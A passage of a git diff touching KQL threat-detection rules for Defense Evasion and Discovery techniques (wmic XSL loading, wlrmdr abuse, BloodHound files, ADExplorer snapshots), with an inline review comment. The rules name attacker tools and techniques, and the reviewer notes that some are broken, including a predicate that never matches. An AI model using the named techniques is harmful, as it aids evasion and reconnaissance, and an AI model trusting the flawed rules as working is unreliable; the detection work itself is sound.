+// - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required
+
+DeviceProcessEvents
 | where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql b/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql
index 8edbb364..dac61897 100644
--- a/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql
+++ b/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql
@@ -1,12 +1,12 @@
-// Title: Windows Processes Suspicious Parent Directory
-// Author: vburov
-// Date: 2019-02-23
-// Level: low
-// Description: Detect suspicious parent processes of well-known Windows processes
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036.005
-// False Positives:
-// - Some security products seem to spawn these
-
-DeviceProcessEvents
+// Title: Windows Processes Suspicious Parent Directory
+// Author: vburov
+// Date: 2019-02-23
+// Level: low
+// Description: Detect suspicious parent processes of well-known Windows processes
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036.005
+// False Positives:
+// - Some security products seem to spawn these
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath in~ ("", "-"))) or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql b/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql
index f5e81a55..acf268fa 100644
--- a/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql
+++ b/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql
@@ -1,12 +1,12 @@
-// Title: Winget Admin Settings Modification
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-17
-// Level: low
-// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence
-// False Positives:
-// - The event doesn't contain information about the type of change. False positives are expected with legitimate changes
-
-DeviceRegistryEvents
+// Title: Winget Admin Settings Modification
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: low
+// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+// False Positives:
+// - The event doesn't contain information about the type of change. False positives are expected with legitimate changes
+
+DeviceRegistryEvents
 | where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey =~ "\\REGISTRY\\A*"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql
index d182d027..2b160075 100644
--- a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql
+++ b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql
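Review bot: The last predicate of the winget hunk, `RegistryKey =~ "\\REGISTRY\\A*"`, can never be true, because `=~` is case-insensitive equality and the `*` is a literal character, so a key that already has to end with `\LocalState\admin_settings` cannot also equal `\REGISTRY\A*` and the rule is dead. The trailing wildcard from the source rule should become a prefix test: `RegistryKey startswith "\\REGISTRY\\A"`. The Windows Defender ThreatSeverityDefaultAction hunk above has the same literal-`*` problem (`endswith "...ThreatSeverityDefaultAction*"` combined with `endswith "\\1"`), which points at the converter's wildcard handling rather than a one-off. Separately, Defender for Endpoint's DeviceRegistryEvents normally reports RegistryKey in `HKEY_LOCAL_MACHINE\...` form rather than `\REGISTRY\MACHINE\...`, so the `\REGISTRY\` prefixes used here and in the Azure AD Health rules further down likely need confirming against live telemetry before these rules are relied on.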
@@ -1,11 +1,11 @@
-// Title: Wlrmdr.EXE Uncommon Argument Or Child Process
-// Author: frack113, manasmbellani
-// Date: 2022-02-16
-// Level: medium
-// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
-// This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Wlrmdr.EXE Uncommon Argument Or Child Process
+// Author: frack113, manasmbellani
+// Date: 2022-02-16
+// Level: medium
+// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
+// This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or (((ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a " or ProcessCommandLine contains "–a " or ProcessCommandLine contains "—a " or ProcessCommandLine contains "―a ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f " or ProcessCommandLine contains "–f " or ProcessCommandLine contains "—f " or ProcessCommandLine contains "―f ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m " or ProcessCommandLine contains "–m " or ProcessCommandLine contains "—m " or ProcessCommandLine contains "―m ") and (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t " or ProcessCommandLine contains "–t " or ProcessCommandLine contains "—t " or ProcessCommandLine contains "―t ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u " or ProcessCommandLine contains "–u " or ProcessCommandLine contains "—u " or ProcessCommandLine contains "―u ") and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql b/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql
index 45ad31ac..56bf5a65 100644
--- a/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql
+++ b/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql
@@ -1,14 +1,14 @@
-// Title: WMIC Loading Scripting Libraries
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-10-17
-// Level: medium
-// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1220
-// False Positives:
-// - The command wmic os get lastboottuptime loads vbscript.dll
-// - The command wmic os get locale loads vbscript.dll
-// - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
-
-DeviceImageLoadEvents
+// Title: WMIC Loading Scripting Libraries
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-17
+// Level: medium
+// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - The command wmic os get lastboottuptime loads vbscript.dll
+// - The command wmic os get locale loads vbscript.dll
+// - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql
index 32824f74..a65f6e63 100644
--- a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql
+++ b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql
@@ -1,11 +1,11 @@
-// Title: Write Protect For Storage Disabled
-// Author: Sreeman
-// Date: 2021-06-11
-// Level: medium
-// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
-// This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562
-
-DeviceProcessEvents
+// Title: Write Protect For Storage Disabled
+// Author: Sreeman
+// Date: 2021-06-11
+// Level: medium
+// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
+// This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql b/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql
index 998683c9..813a859f 100644
--- a/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql
+++ b/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql
@@ -1,10 +1,10 @@
-// Title: Writing Of Malicious Files To The Fonts Folder
-// Author: Sreeman
-// Date: 2020-04-21
-// Level: medium
-// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1211, attack.t1059, attack.defense-evasion, attack.persistence, attack.execution
-
-DeviceProcessEvents
+// Title: Writing Of Malicious Files To The Fonts Folder
+// Author: Sreeman
+// Date: 2020-04-21
+// Level: medium
+// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1211, attack.t1059, attack.defense-evasion, attack.persistence, attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql b/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql
index 97d8461a..9a351895 100644
--- a/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql
+++ b/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql
@@ -1,12 +1,12 @@
-// Title: WSL Kali-Linux Usage
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-10-10
-// Level: high
-// Description: Detects the use of Kali Linux through Windows Subsystem for Linux
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-// False Positives:
-// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
-
-DeviceProcessEvents
+// Title: WSL Kali-Linux Usage
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-10
+// Level: high
+// Description: Detects the use of Kali Linux through Windows Subsystem for Linux
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
+
+DeviceProcessEvents
 | where (((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\packages\\KaliLinux") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\kali.exe")) or (FolderPath contains ":\\Program Files\\WindowsApps\\KaliLinux." and FolderPath endswith "\\kali.exe")) or ((((FolderPath contains "\\kali.exe" or FolderPath contains "\\KaliLinux") or (ProcessCommandLine contains "Kali.exe" or ProcessCommandLine contains "Kali-linux" or ProcessCommandLine contains "kalilinux")) and (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe")) and (not((ProcessCommandLine contains " -i " or ProcessCommandLine contains " --install " or ProcessCommandLine contains " --unregister "))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
index 0be93573..6204c9b9 100644
--- a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
+++ b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
@@ -1,12 +1,12 @@
-// Title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-01
-// Level: medium
-// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218
-// False Positives:
-// - Legitimate ".xbap" being executed via "PresentationHost"
-
-DeviceProcessEvents
+// Title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-01
+// Level: medium
+// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Legitimate ".xbap" being executed via "PresentationHost"
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql
index c3d95d22..09ee5359 100644
--- a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql
+++ b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql
@@ -1,15 +1,15 @@
-// Title: XSL Script Execution Via WMIC.EXE
-// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019-10-21
-// Level: medium
-// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files.
-// Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-// Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1220
-// False Positives:
-// - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.
-// - Static format arguments - https://petri.com/command-line-wmi-part-3
-
-DeviceProcessEvents
+// Title: XSL Script Execution Via WMIC.EXE
+// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files.
+// Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+// Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.
+// - Static format arguments - https://petri.com/command-line-wmi-part-3
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format" or ProcessCommandLine contains "–format" or ProcessCommandLine contains "—format" or ProcessCommandLine contains "―format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql
index f09e0895..f408fd67 100644
--- a/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql
+++ b/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql
@@ -1,10 +1,10 @@
-// Title: Active Directory Database Snapshot Via ADExplorer
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-14
-// Level: medium
-// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
-
-DeviceProcessEvents
+// Title: Active Directory Database Snapshot Via ADExplorer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql b/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql
index 72ac1e7b..3bf1823b 100644
--- a/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql
+++ b/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql
@@ -1,12 +1,12 @@
-// Title: ADExplorer Writing Complete AD Snapshot Into .dat File
-// Author: Arnim Rupp (Nextron Systems), Thomas Patzke
-// Date: 2025-07-09
-// Level: medium
-// Description: Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
-// False Positives:
-// - Legitimate use of ADExplorer by administrators creating .dat snapshots
-
-DeviceFileEvents
+// Title: ADExplorer Writing Complete AD Snapshot Into .dat File
+// Author: Arnim Rupp (Nextron Systems), Thomas Patzke
+// Date: 2025-07-09
+// Level: medium
+// Description: Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+// False Positives:
+// - Legitimate use of ADExplorer by administrators creating .dat snapshots
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\ADExp.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64a.exe") and FolderPath endswith ".dat"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql b/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql
index 66ee8f06..c97e2db0 100644
--- a/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql
+++ b/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql
@@ -1,12 +1,12 @@
-// Title: Advanced IP Scanner - File Event
-// Author: @ROxPinTeddy
-// Date: 2020-05-12
-// Level: medium
-// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1046
-// False Positives:
-// - Legitimate administrative use
-
-DeviceFileEvents
+// Title: Advanced IP Scanner - File Event
+// Author: @ROxPinTeddy
+// Date: 2020-05-12
+// Level: medium
+// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administrative use
+
+DeviceFileEvents
 | where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql
index b32cb1dd..ebd0a0c3 100644
--- a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql
+++ b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql
@@ -1,11 +1,11 @@
-// Title: Azure AD Health Monitoring Agent Registry Keys Access
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
-// Date: 2021-08-26
-// Level: medium
-// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.
-// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1012
-
-DeviceRegistryEvents
+// Title: Azure AD Health Monitoring Agent Registry Keys Access
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-08-26
+// Level: medium
+// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.
+// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
 | where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql
index 8bc9d78c..14234cf9 100644
--- a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql
+++ b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql
@@ -1,13 +1,13 @@
-// Title: Azure AD Health Service Agents Registry Keys Access
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
-// Date: 2021-08-26
-// Level: medium
-// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).
-// Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).
-// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent.
-// Make sure you set the SACL to propagate to its sub-keys.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1012
-
-DeviceRegistryEvents
+// Title: Azure AD Health Service Agents Registry Keys Access
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-08-26
+// Level: medium
+// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).
+// Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).
+// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent.
+// Make sure you set the SACL to propagate to its sub-keys.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
 | where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\ADHealthAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/bloodhound_collection_files.kql b/KQL/rules/Discovery/bloodhound_collection_files.kql
index 3a14b15a..d7712fac 100644
--- a/KQL/rules/Discovery/bloodhound_collection_files.kql
+++ b/KQL/rules/Discovery/bloodhound_collection_files.kql
@@ -1,12 +1,12 @@
-// Title: BloodHound Collection Files
-// Author: C.J. May
-// Date: 2022-08-09
-// Level: high
-// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
-// False Positives:
-// - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise
-
-DeviceFileEvents
+// Title: BloodHound Collection Files
+// Author: C.J. May
+// Date: 2022-08-09
+// Level: high
+// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
+// False Positives:
+// - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise
+
+DeviceFileEvents
 | where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/capabilities_discovery_linux.kql b/KQL/rules/Discovery/capabilities_discovery_linux.kql
index 32b05ec8..30c6e8d6 100644
--- a/KQL/rules/Discovery/capabilities_discovery_linux.kql
+++ b/KQL/rules/Discovery/capabilities_discovery_linux.kql
@@ -1,10 +1,10 @@
-// Title: Capabilities Discovery - Linux
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-28
-// Level: low
-// Description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
-// MITRE Tactic: Discovery
